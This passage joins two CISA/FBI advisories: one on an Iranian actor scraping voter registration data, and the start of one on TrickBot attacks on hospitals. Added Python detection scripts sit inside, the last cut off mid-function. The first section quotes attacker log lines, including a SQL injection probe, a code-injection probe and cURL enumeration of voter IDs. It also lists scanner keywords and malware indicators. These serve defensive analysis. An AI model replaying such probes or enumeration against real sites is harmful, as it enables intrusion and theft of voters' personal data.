
AA20-304A: Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data

Original release date: October 30, 2020 | Last revised: November 3, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 8 framework. See the <a href=”https://attack.mitre.org/versions/v8/techniques/enterprise/”>ATT&amp;CK for Enterprise version 8</a> for all referenced threat actor techniques.</em></p>

<p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). CISA and the FBI are aware of an Iranian advanced persistent threat (APT) actor targeting U.S. state websites—to include election websites. CISA and the FBI assess this actor is responsible for&nbsp;the mass dissemination of voter intimidation emails to U.S. citizens and the dissemination of U.S. election-related disinformation in mid-October 2020. <fn value=”1″>This disinformation (hereinafter, “the propaganda video”) was in the form of a video purporting to misattribute the activity to a U.S. domestic actor and implies that individuals could cast fraudulent ballots, even from overseas. https://www.odni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security. </fn>&nbsp;(Reference FBI FLASH message <a href=”https://www.ic3.gov/Media/News/2020/201030.pdf”>ME-000138-TT</a>, disseminated October 29, 2020). Further evaluation by CISA and the FBI has identified the targeting of U.S. state election websites was an intentional effort to influence and interfere with the 2020 U.S. presidential election.</p>

<p>Click <a href=”https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A-Iranian_Advanced_Persistent_Threat_Actor_Identified_Obtaining_Voter_Registration_Data.pdf”>here</a> for a PDF version of this report.</p>
<h3>Technical Details</h3><p>Analysis by CISA and the FBI indicates this actor scanned state websites, to include state election websites, between September 20 and September 28, 2020, with the Acunetix vulnerability scanner (<em>Active Scanning: Vulnerability Scanning</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1595/002/”>T1595.002</a>]). Acunetix is a widely used and legitimate web scanner, which has been used by threat actors for nefarious purposes. Organizations that do not regularly use Acunetix should monitor their logs for any activity from the program that originates from IP addresses provided in this advisory and consider it malicious reconnaissance behavior.&nbsp;</p>

<p>Additionally, CISA and the FBI observed this actor attempting to exploit websites to obtain copies of voter registration data between September 29 and October 17, 2020 (<em>Exploit Public-Facing Application</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1190/”>T1190</a>]). This includes attempted exploitation of known vulnerabilities, directory traversal, Structured Query Language (SQL) injection, web shell uploads, and leveraging unique flaws in websites.&nbsp;</p>

<p>CISA and the FBI can confirm that the actor successfully obtained voter registration data in at least one state. The access of voter registration data appeared to involve the abuse of website misconfigurations and a scripted process using the cURL tool to iterate through voter records. A review of the records that were copied and obtained reveals the information was used in the propaganda video.&nbsp;</p>

<p>CISA and FBI analysis of identified activity against state websites, including state election websites, referenced in this product cannot all be fully attributed to this Iranian APT actor. FBI analysis of the Iranian APT actor’s activity has identified targeting of U.S. elections’ infrastructure (<em>Compromise Infrastructure</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1584/">T1584</a>]) within a similar timeframe, use of IP addresses and IP ranges—including numerous virtual private network (VPN) service exit nodes—which correlate to this Iran APT actor (<em>Gather Victim Host Information</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1592/">T1592</a>]), and other investigative information.</p>

<h2>Reconnaissance</h2>

<p>The FBI has information indicating this Iran-based actor attempted to access PDF documents from state voter sites using advanced open-source queries (<em>Search Open Websites and Domains</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1593″>T1593</a>]). The actor demonstrated interest in PDFs hosted on URLs with the words “vote” or “voter” and “registration.” The FBI identified queries of URLs for election-related sites.&nbsp;</p>

<p>The FBI also has information indicating the actor researched the following information in a suspected attempt to further their efforts to survey and exploit state election websites.</p>

<ul>
<li>YOURLS exploit</li>
<li>Bypassing ModSecurity Web Application Firewall</li>
<li>Detecting Web Application Firewalls</li>
<li>SQLmap tool</li>
</ul>

<h3>Acunetix Scanning</h3>

<p>CISA’s analysis identified the scanning of multiple entities by the Acunetix Web Vulnerability scanning platform between September 20 and September 28, 2020 (<em>Active Scanning: Vulnerability Scanning</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1595/002/”>T1595.002</a>]).&nbsp;</p>

<p>The actor used the scanner to attempt SQL injection into various fields in <code>/registration/registration/details</code> with status codes 404 or 500.</p>

<p><code>/registration/registration/details?addresscity=-1 or 3*2&lt;(0+5+513-513) -- &amp;addressstreet1=xxxxx&amp;btnbeginregistration=begin voter registration&amp;btnnextelectionworkerinfo=next&amp;btnnextpersonalinfo=next&amp;btnnextresdetails=next&amp;btnnextvoterinformation=next&amp;btnsubmit=submit&amp;chkageverno=on&amp;chkageveryes=on&amp;chkcitizenno=on&amp;chkcitizenyes=on&amp;chkdisabledvoter=on&amp;chkelectionworker=on&amp;chkresprivate=1&amp;chkstatecancel=on&amp;dlnumber=1&amp;dob=xxxx/x/x&amp;email=sample@email.tst&amp;firstname=xxxxx&amp;gender=radio&amp;hdnaddresscity=&amp;hdngender=&amp;last4ssn=xxxxx&amp;lastname=xxxxxinjjeuee&amp;mailaddresscountry=sample@xxx.xxx&amp;mailaddressline1=sample@email.tst&amp;mailaddressline2=sample@xxx.xxx&amp;mailaddressline3=sample@xxx.xxx&amp;mailaddressstate=aa&amp;mailaddresszip=sample@xxxx.xxx&amp;mailaddresszipex=sample@xxx.xxx&amp;middlename=xxxxx&amp;overseas=1&amp;partycode=a&amp;phoneno1=xxx-xxx-xxxx&amp;phoneno2=xxx-xxx-xxxx&amp;radio=consent&amp;statecancelcity=xxxxxxx&amp;statecancelcountry=usa&amp;statecancelstate=XXaa&amp;statecancelzip=xxxxx&amp;statecancelzipext=xxxxx&amp;suffixname=esq&amp;txtmailaddresscity=sample@xxx.xxx</code></p>

<h3>Requests</h3>

<p>The actor used the following requests associated with this scanning activity.</p>

<p><code>2020-09-26 13:12:56 x.x.x.x GET /x/x v[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 0</code></p>

<p><code>2020-09-26 13:13:19 X.X.x.x GET /x/x voterid[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 1375</code></p>

<p><code>2020-09-26 13:13:18 .X.x.x GET /x/x voterid=;print(md5(acunetix_wvs_security_test)); 443 - X.X.x.x</code></p>

<h3>User Agents Observed</h3>

<p>CISA and FBI have observed the following user agents associated with this scanning activity.</p>

<p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0</code></p>

<p><code>Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4</code></p>

<p><code>Mozilla/5.0+(X11;+U;+Linux+i686;+en-US;+rv:1.8.1.17)+Gecko/20080922+Ubuntu/7.10+(gutsy)+Firefox/2.0.0.17</code></p>

<h2>Exfiltration</h2>

<h3>Obtaining Voter Registration Data</h3>

<p>Following the review of web server access logs, CISA analysts, in coordination with the FBI, found instances of the cURL and FDM User Agents sending GET requests to a web resource associated with voter registration data. The activity occurred between September 29 and October 17, 2020. Suspected scripted activity submitted several hundred thousand queries iterating through voter identification values, and retrieving results with varying levels of success (<em>Gather Victim Identity Information</em> [<a href="https://attack.mitre.org/versions/v8/techniques/T1589/">T1589</a>]). A sample of the records identified by the FBI reveals they match information in the aforementioned propaganda video.</p>

<h3>Requests</h3>

<p>The actor used the following requests.</p>

<p><code>2020-10-17 13:07:51 x.x.x.x GET /x/x voterid=XXXX1 443 - x.x.x.x curl/7.55.1 - 200 0 0 1406</code></p>

<p><code>2020-10-17 13:07:55 x.x.x.x GET /x/x voterid=XXXX2 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390</code></p>

<p><code>2020-10-17 13:07:58 x.x.x.x GET /x/x voterid=XXXX3 443 - x.x.x.x curl/7.55.1 - 200 0 0 1625</code></p>

<p><code>2020-10-17 13:08:00 x.x.x.x GET /x/x voterid=XXXX4 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390</code></p>

<p>Note: incrementing <code>voterid</code> values in the <code>cs_uri_query</code> field.</p>

<h3>User Agents</h3>

<p>CISA and FBI have observed the following user agents.</p>

<p><code>FDM+3.x</code> (Free Download Manager v3)</p>

<p><code>curl/7.55.1</code></p>

<p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0<br />
Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4</code></p>

<p>See figure 1 below for a timeline of the actor’s malicious activity.</p>

<p><img alt=”” data-entity-type=”file” data-entity-uuid=”b752a4ee-19a8-4f25-824d-d036cf917f5c” height=”240″ src=”https://us-cert.cisa.gov/sites/default/files/2020-10/Technical%20Findings.png” width=”817″ /></p>

<p class=”text-align-center”><em>Figure 1: Overview of malicious activity</em></p>
<h3>Mitigations</h3><h2>Detection</h2>

<h3>Acunetix Scanning</h3>

<p>Organizations can identify Acunetix scanning activity by using the following keywords while performing log analysis.</p>

<ul>
<li><code>$acunetix</code></li>
<li><code>acunetix_wvs_security_test</code></li>
</ul>
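<p>One way to run this keyword search, together with a check for the incrementing <code>voterid</code> pattern noted under Exfiltration, over IIS W3C logs. This is an added example, not code from CISA or the FBI; the sample log, its documentation-range IP addresses, the <code>/app/lookup</code> path and the <code>min_run</code> threshold are constructed assumptions.</p>

```python
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus

# Default IIS W3C field order, matching the log lines quoted in the advisory.
FIELDS = (
    "date time s_ip cs_method cs_uri_stem cs_uri_query s_port cs_username "
    "c_ip cs_user_agent cs_referer sc_status sc_substatus sc_win32_status time_taken"
).split()

# Keywords the advisory gives for identifying Acunetix probes.
SCANNER_KEYWORDS = ("$acunetix", "acunetix_wvs_security_test")

# Constructed sample (documentation-range IPs, invented path and voter IDs).
SAMPLE_LOG = """\
#Software: constructed sample in IIS W3C layout
2020-09-26 13:12:56 192.0.2.10 GET /app/lookup v[$acunetix]=1 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1) - 200 0 0 0
2020-09-26 13:13:18 192.0.2.10 GET /app/lookup voterid=;print(md5(acunetix_wvs_security_test)); 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1) - 500 0 0 15
2020-09-26 13:13:19 192.0.2.10 GET /app/lookup voterid[%24acunetix]=1 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1) - 200 0 0 1375
2020-10-17 09:02:11 192.0.2.10 GET /app/lookup voterid=73311 443 - 203.0.113.77 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 1502
2020-10-17 13:07:51 192.0.2.10 GET /app/lookup voterid=50001 443 - 203.0.113.5 curl/7.55.1 - 200 0 0 1406
2020-10-17 13:07:55 192.0.2.10 GET /app/lookup voterid=50002 443 - 203.0.113.5 curl/7.55.1 - 200 0 0 1390
2020-10-17 13:07:58 192.0.2.10 GET /app/lookup voterid=50003 443 - 203.0.113.5 curl/7.55.1 - 200 0 0 1625
2020-10-17 13:08:00 192.0.2.10 GET /app/lookup voterid=50004 443 - 203.0.113.5 curl/7.55.1 - 200 0 0 1390
2020-10-17 13:08:03 192.0.2.10 GET /app/lookup voterid=50005 443 - 203.0.113.5 curl/7.55.1 - 404 0 0 12
2020-10-17 14:40:09 192.0.2.10 GET /app/lookup voterid=12004 443 - 203.0.113.77 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 1488
2020-10-17 14:41:00 truncated line
"""


def parse_log(text):
    """Return one dict per well-formed log line; skip comments and short lines."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) != len(FIELDS):
            continue
        records.append(dict(zip(FIELDS, parts)))
    return records


def keyword_hits(records):
    """Records whose URL-decoded query string contains an Acunetix keyword."""
    hits = []
    for rec in records:
        # Decode first so an encoded "$" (%24) cannot hide the keyword.
        query = unquote_plus(rec["cs_uri_query"]).lower()
        if any(keyword in query for keyword in SCANNER_KEYWORDS):
            hits.append(rec)
    return hits


def longest_increment_run(values):
    """Length of the longest stretch where each value is the previous one + 1."""
    best = run = 1 if values else 0
    for prev, cur in zip(values, values[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def enumeration_runs(records, param="voterid", min_run=4):
    """Clients that walked `param` through consecutive numeric values."""
    values = defaultdict(list)
    agents = defaultdict(set)
    for rec in records:
        for key, value in parse_qsl(rec["cs_uri_query"]):
            if key.lower() == param and value.isascii() and value.isdigit():
                client = (rec["c_ip"], rec["cs_uri_stem"])
                values[client].append(int(value))
                agents[client].add(rec["cs_user_agent"])
    findings = []
    for (c_ip, stem), seen in values.items():
        run = longest_increment_run(seen)
        if run >= min_run:  # min_run is an assumed threshold; tune per site
            findings.append({
                "c_ip": c_ip,
                "cs_uri_stem": stem,
                "requests": len(seen),
                "longest_run": run,
                "user_agents": sorted(agents[(c_ip, stem)]),
            })
    return sorted(findings, key=lambda f: f["longest_run"], reverse=True)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for hit in keyword_hits(recs):
        print("scanner keyword:", hit["date"], hit["time"], hit["c_ip"], hit["cs_uri_query"])
    for finding in enumeration_runs(recs):
        print("sequential enumeration:", finding)
```

<p>A hit on either check is a lead for review rather than attribution, since the scanner and cURL are both widely used legitimate tools.</p>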

<h3>Indicators of Compromise</h3>

<p>For a downloadable copy of IOCs, see <a href=”https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A.stix.xml”>AA20-304A.stix</a>.</p>

<p><strong>Disclaimer:</strong> <em>many of the IP addresses included below likely correspond to publicly available VPN services, which can be used by individuals all over the world. This creates the potential for a significant number of false positives; only activity listed in this advisory warrants further investigation. The actor likely uses various IP addresses and VPN services.</em></p>

<p>The following IPs have been associated with this activity.</p>


<p>CISA and the FBI are aware the following IOCs have been used by this Iran-based actor. These IP addresses facilitated the mass dissemination of voter intimidation email messages on October 20, 2020.</p>


<h2>Recommendations</h2>

<p>The following list provides recommended self-protection mitigation strategies against cyber techniques used by advanced persistent threat actors:&nbsp;</p>

<ul>
<li>Validate input as a method of sanitizing untrusted input submitted by web application users. Validating input can significantly reduce the probability of successful exploitation by providing protection against security flaws in web applications. The types of attacks possibly prevented include SQL injection, Cross Site Scripting (XSS), and command injection.</li>
<li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable unnecessary services and install available patches for the services in use. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li>
<li>Verify all cloud-based virtual machine instances with a public IP, and avoid using open RDP ports, unless there is a valid need. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.</li>
<li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li>
<li>Apply multi-factor authentication, when possible.</li>
<li>Maintain a good information back-up strategy by routinely backing up all critical data and system configuration information on a separate device. Store the backups offline, verify their integrity, and verify the restoration process.</li>
<li>Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.</li>
<li>When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.</li>
<li>Ensure third parties that require RDP access follow internal remote access policies.</li>
<li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li>
<li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs. However, recognize the security of VPNs matches the security of the connected devices.</li>
<li>Use security features provided by social media platforms; use <a href=”https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords”>strong passwords</a>, change passwords frequently, and use a different password for each social media account.&nbsp;</li>
<li>See CISA’s Tip on <a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>Best Practices for Securing Election Systems</a> for more information.&nbsp;</li>
</ul>

<h3>General Mitigations</h3>

<p><em><strong>Keep applications and systems updated and patched</strong></em></p>

<p>Apply all available software updates and patches and automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because threat actors are quick to create new exploits following the release of a patch. These “N-day” exploits can be as damaging as zero-day exploits. Ensure the authenticity and integrity of vendor updates by using signed updates delivered over protected links. Without the rapid and thorough application of patches, threat actors can operate inside a defender’s patch cycle. <fn value="2">NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies” https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Additionally, use tools (e.g., the OWASP Dependency-Check Project tool <fn value="3">https://owasp.org/www-project-dependency-check/</fn>) to identify the publicly known vulnerabilities in third-party libraries depended upon by the application.</p>

<p><em><strong>Scan web applications for SQL injection and other common web vulnerabilities</strong></em></p>

<p>Implement a plan to scan public-facing web servers for common web vulnerabilities (e.g., SQL injection, cross-site scripting) by using a commercial web application vulnerability scanner in combination with a source code scanner. <fn value=”4″>https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm</fn> Fixing or patching vulnerabilities after they are identified is especially crucial for networks hosting older web applications. As sites get older, more vulnerabilities are discovered and exposed.</p>

<p><em><strong>Deploy a web application firewall</strong></em></p>

<p>Deploy a web application firewall (WAF) to prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.&nbsp;</p>

<p><em><strong>Deploy techniques to protect against web shells</strong></em></p>

<p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware. <fn value=”5″>NSA &amp; ASD “CyberSecurity Information: Detect and Prevent Web Shell Malware” https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF</fn> Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.&nbsp;</p>

<p><em><strong>Use multi-factor authentication for administrator accounts</strong></em></p>

<p>Prioritize protection for accounts with elevated privileges, remote access, or used on high-value assets. <fn value=”6″>https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs</fn> Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs). <fn value=”7″>NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies” https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf</fn> Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p>

<p><em><strong>Remediate critical web application security risks</strong></em></p>

<p>First, identify and remediate critical web application security risks. Next, move on to other less critical vulnerabilities. Follow available guidance on securing web applications. <fn value=”8″>NSA “Building Web Applications – Security for Developers” https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm</fn>&nbsp;<fn value=”9″>https://owasp.org/www-project-top-ten/</fn> <fn value=”10″>https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html</fn></p>

<h2>How do I respond to unauthorized access to election-related systems?</h2>

<h3>Implement your security incident response and business continuity plan</h3>

<p>It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.</p>

<h3>Contact CISA or law enforcement immediately&nbsp;</h3>

<p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href="mailto:Central@cisa.gov">Central@cisa.gov</a> or 888-282-0870) or the FBI through a local field office or the FBI’s Cyber Division (<a href="mailto:CyWatch@ic.fbi.gov">CyWatch@ic.fbi.gov</a> or 855-292-3937).</p>

<h2>Resources</h2>

<ul>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST19-002″>Best Practices for Securing Election Systems</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST16-001″>Securing Voter Registration Data&nbsp;</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST18-006″>Website Security&nbsp;</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST04-014″>Avoiding Social Engineering and Phishing Attacks</a></li>
<li>CISA Tip: <a href=”https://us-cert.cisa.gov/ncas/tips/ST18-001″>Securing Network Infrastructure Devices</a>&nbsp;</li>
<li>Joint Advisory: <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-245a”>Technical Approaches to Uncovering and Remediating Malicious Activity</a></li>
<li>CISA Insights: <a href=”https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf”>Actions to Counter Email-Based Attacks on Election-related Entities</a>&nbsp;</li>
<li>FBI and CISA Public Service Announcement (PSA): <a href=”https://ic3.gov/Media/Y2020/PSA201002″>Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA201001″>Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections</a>&nbsp;</li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200930″>Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a>&nbsp;</li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200928″>False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections</a></li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200924″>Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a>&nbsp;</li>
<li>FBI and CISA PSA: <a href=”https://ic3.gov/Media/Y2020/PSA200922″>Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Result</a></li>
</ul>

<h3>Revisions</h3>
<ul> <li>October 30, 2020: Initial Version</li> <li>November 3, 2020: Updated IOC disclaimer to emphasize that only activity listed in this alert warrants further investigation.</li> </ul>
<hr />

AA20-302A: Ransomware Activity Targeting the Healthcare and Public Health Sector

Original release date: October 28, 2020 | Last revised: November 2, 2020<br/><h3>Summary</h3><p><strong><em>This advisory was updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection.</em></strong></p>

<p class=”tip-intro” style=”font-size: 15px;”><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 7 framework. See the <a href=”https://attack.mitre.org/versions/v7/techniques/enterprise/”>ATT&amp;CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p>

<p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health&nbsp;(HPH) Sector&nbsp;to infect systems with ransomware, notably Ryuk and Conti, for financial gain.</p>

<p>CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.</p>

<p><a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf”>Click here</a> for a PDF version of this report.</p>

<h4>Key Findings</h4>

<ul>
<li>CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with TrickBot and BazarLoader malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.</li>
<li>These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.</li>
</ul>
<h3>Technical Details</h3><h3>Threat Details</h3>

<p>The cybercriminal enterprise behind TrickBot, which is likely also the creator of BazarLoader malware, has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. These threat actors increasingly use loaders—like TrickBot and BazarLoader (or BazarBackdoor)—as part of their malicious cyber campaigns. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim’s machine.</p>

<h4>TrickBot</h4>

<p>What began as a banking trojan and descendant of Dyre malware, TrickBot now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk and Conti.</p>

<p>In early 2019, the FBI began to observe new TrickBot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims—such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, TrickBot developers created <code>anchor_dns</code>, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.</p>

<p><code>anchor_dns</code> is a backdoor that allows victim machines to communicate with C2&nbsp;servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. <code>anchor_dns</code> uses a single-byte <code>XOR</code> cipher to encrypt its communications, which have been observed using key <code>0xB9</code>. Once decrypted, the string <code>anchor_dns</code> can be found in the DNS request traffic.</p>

<h4>TrickBot Indicators of Compromise</h4>

<p>After successful execution of the malware, TrickBot copies itself as an executable file with a 12-character&nbsp;randomly generated file name (e.g. <code>mfjdieks.exe</code>) and places this file in one of the following directories.</p>

<ul>
<li><code>C:\Windows</code></li>
<li><code>C:\Windows\SysWOW64</code></li>
<li><code>C:\Users\[Username]\AppData\Roaming</code></li>
</ul>

<p>Once the executable is running and has established communication with its C2 servers, it places the modules downloaded from those servers, selected for the infected host’s processor architecture (32- or 64-bit instruction set), in the host’s <code>%APPDATA%</code> or <code>%PROGRAMDATA%</code> directory, such as <code>%AppData\Roaming\winapp</code>. Some commonly named plugins that are created in a Modules subdirectory are (the detected architecture is appended to the module filename, e.g., <code>importDll32</code> or <code>importDll64</code>):</p>

<ul>
<li><code>Systeminfo</code></li>
<li><code>importDll</code></li>
<li><code>outlookDll</code></li>
<li><code>injectDll</code> with a directory (ex. <code>injectDLL64_configs</code>) containing configuration files:
<ul>
<li><code>dinj</code></li>
<li><code>sinj</code></li>
<li><code>dpost</code></li>
</ul>
</li>
<li><code>mailsearcher</code> with a directory (ex. <code>mailsearcher64_configs</code>) containing configuration file:
<ul>
<li><code>mailconf</code></li>
</ul>
</li>
<li><code>networkDll</code> with a directory (ex. <code>networkDll64_configs</code>) containing configuration file:
<ul>
<li><code>dpost</code></li>
</ul>
</li>
<li><code>wormDll</code></li>
<li><code>tabDll</code></li>
<li><code>shareDll</code></li>
</ul>

<p>A file named <code>client_id</code>, <code>data</code>, or <code>FAQ</code> containing the assigned bot ID of the compromised system is created in the malware directory. A file named <code>group_tag</code> or <code>Readme.md</code> containing the TrickBot campaign IDs is created in the malware directory.</p>

<p>The malware may also drop a file named <code>anchorDiag.txt</code> in one of the directories listed above.</p>

<p>Part of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded <code>GUID</code>. The <code>GUID</code> is composed of <code>/GroupID/ClientID/</code> with the following naming convention:</p>

<p><code>/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/</code>.</p>
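<p>A triage helper for the single-byte XOR decryption and the GUID naming convention described above, added here as an example and not taken from the advisory: it decodes a captured DNS query name with key <code>0xB9</code>, checks for the <code>anchor_dns</code> string, and splits out the fields of the naming convention. The advisory does not say how the encrypted bytes are placed into DNS labels; hex-encoded labels, the zone <code>c2.example</code> and the sample host values are assumptions constructed for the demonstration, and the fallback over all 256 keys goes beyond the one key the advisory reports.</p>

```python
import re

KNOWN_KEY = 0xB9        # single-byte XOR key reported in the advisory
MARKER = b"anchor_dns"  # string the advisory says is visible once decrypted

# /anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/
GUID_RE = re.compile(
    rb"/(?P<group>anchor_dns)/(?P<computer>[^/]+)_(?P<build>[^/_.]+)"
    rb"\.(?P<client_id>[^/]{32})/"
)

ZONE = "c2.example"  # hypothetical zone under observation (reserved TLD)

# Constructed plaintext that follows the naming convention; not real telemetry.
SAMPLE_PLAINTEXT = (
    b"/anchor_dns/WS-RECEPTION7_W10017134.0123456789ABCDEF0123456789ABCDEF/"
)


def xor_bytes(data, key):
    """Apply a single-byte XOR key; the same call encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def make_sample_qname(plaintext, key, zone=ZONE):
    """Build a constructed test fixture: XOR, hex-encode, split into labels."""
    hexed = xor_bytes(plaintext, key).hex()
    labels = [hexed[i:i + 62] for i in range(0, len(hexed), 62)]  # labels <= 63
    return ".".join(labels + [zone])


def payload_from_qname(qname, zone=ZONE):
    """Return the raw bytes carried left of `zone`, or None if not hex labels."""
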